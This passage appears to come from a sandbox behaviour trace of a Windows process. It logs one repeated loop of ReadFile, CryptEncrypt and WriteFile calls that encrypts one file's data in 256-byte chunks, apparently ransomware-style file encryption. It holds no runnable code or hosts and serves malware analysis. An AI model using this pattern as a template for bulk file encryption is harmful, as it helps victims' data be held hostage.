CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.388] GetLastError () returned 0x0 [0149.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.388] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.388] GetLastError () returned 0x0 [0149.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.388] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.388] GetLastError () returned 0x0 [0149.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.388] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.388] GetLastError () returned 0x0 [0149.388] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.388] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.388] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.389] GetLastError () returned 0x0 [0149.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.389] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.389] GetLastError () returned 0x0 [0149.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.389] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.389] GetLastError () returned 0x0 [0149.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.389] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.389] GetLastError () returned 0x0 [0149.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.389] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.389] GetLastError () returned 0x0 [0149.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.389] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.389] GetLastError () returned 0x0 [0149.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.389] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.389] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.389] GetLastError () returned 0x0 [0149.389] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.390] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.390] GetLastError () returned 0x0 [0149.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.390] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.390] GetLastError () returned 0x0 [0149.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.390] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.390] GetLastError () returned 0x0 [0149.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.390] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.390] GetLastError () returned 0x0 [0149.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.390] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.390] GetLastError () returned 0x0 [0149.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.390] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.390] GetLastError () returned 0x0 [0149.390] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.390] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.391] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.391] GetLastError () returned 0x0 [0149.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.391] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.391] GetLastError () returned 0x0 [0149.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.391] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.391] GetLastError () returned 0x0 [0149.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.391] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.391] GetLastError () returned 0x0 [0149.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.391] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.391] GetLastError () returned 0x0 [0149.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.391] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.391] GetLastError () returned 0x0 [0149.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.391] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.391] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.391] GetLastError () returned 0x0 [0149.391] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.392] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.392] GetLastError () returned 0x0 [0149.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.392] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.392] GetLastError () returned 0x0 [0149.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.392] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.392] GetLastError () returned 0x0 [0149.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.392] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.392] GetLastError () returned 0x0 [0149.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.392] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.392] GetLastError () returned 0x0 [0149.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.392] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.392] GetLastError () returned 0x0 [0149.392] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.392] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.393] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.393] GetLastError () returned 0x0 [0149.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.393] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.393] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0149.393] GetLastError () returned 0x0 [0149.393] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0149.393] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0149.393] CryptEncrypt (in: hKey=0x9ad7f8, hHash=0x0, Final=0, dwFlags=0x0, 